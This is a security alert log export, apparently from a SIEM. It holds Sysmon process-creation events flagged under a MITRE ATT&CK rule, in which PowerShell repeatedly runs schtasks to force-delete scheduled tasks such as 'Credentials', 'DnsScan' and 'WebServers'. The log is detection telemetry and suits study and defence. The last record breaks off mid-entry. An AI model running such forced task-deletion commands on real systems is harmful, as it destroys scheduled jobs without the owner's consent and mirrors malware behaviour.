Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.621 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001073051a00} +ProcessId: 8072 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HispDemorn /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.623453600Z"",""eventRecordID"":""2255"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.621\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001073051a00}\r\nProcessId: 8072\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.621"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001073051a00}"",""processId"":""8072"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HispDemorn /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.900",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.600 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010dd031a00} +ProcessId: 7988 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN werclpsyport /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.602160000Z"",""eventRecordID"":""2254"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.600\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010dd031a00}\r\nProcessId: 7988\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.600"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010dd031a00}"",""processId"":""7988"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN werclpsyport /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.884",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.579 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-00104e021a00} +ProcessId: 7892 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN TablteInputout /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.581662500Z"",""eventRecordID"":""2253"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.579\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-00104e021a00}\r\nProcessId: 7892\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.579"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-00104e021a00}"",""processId"":""7892"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN TablteInputout /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.868",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.558 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010bf001a00} +ProcessId: 7840 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Credentials /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.561246000Z"",""eventRecordID"":""2252"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.558\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010bf001a00}\r\nProcessId: 7840\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.558"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010bf001a00}"",""processId"":""7840"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Credentials /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.853",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.536 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-00102fff1900} +ProcessId: 7752 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WebServers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.538483600Z"",""eventRecordID"":""2251"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.536\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-00102fff1900}\r\nProcessId: 7752\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.536"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-00102fff1900}"",""processId"":""7752"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WebServers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.837",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.514 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010a0fd1900} +ProcessId: 7676 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsScan /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.516223900Z"",""eventRecordID"":""2250"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.514\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010a0fd1900}\r\nProcessId: 7676\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.514"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010a0fd1900}"",""processId"":""7676"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsScan /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.821",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.491 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001010fc1900} +ProcessId: 7604 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Ddrivers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 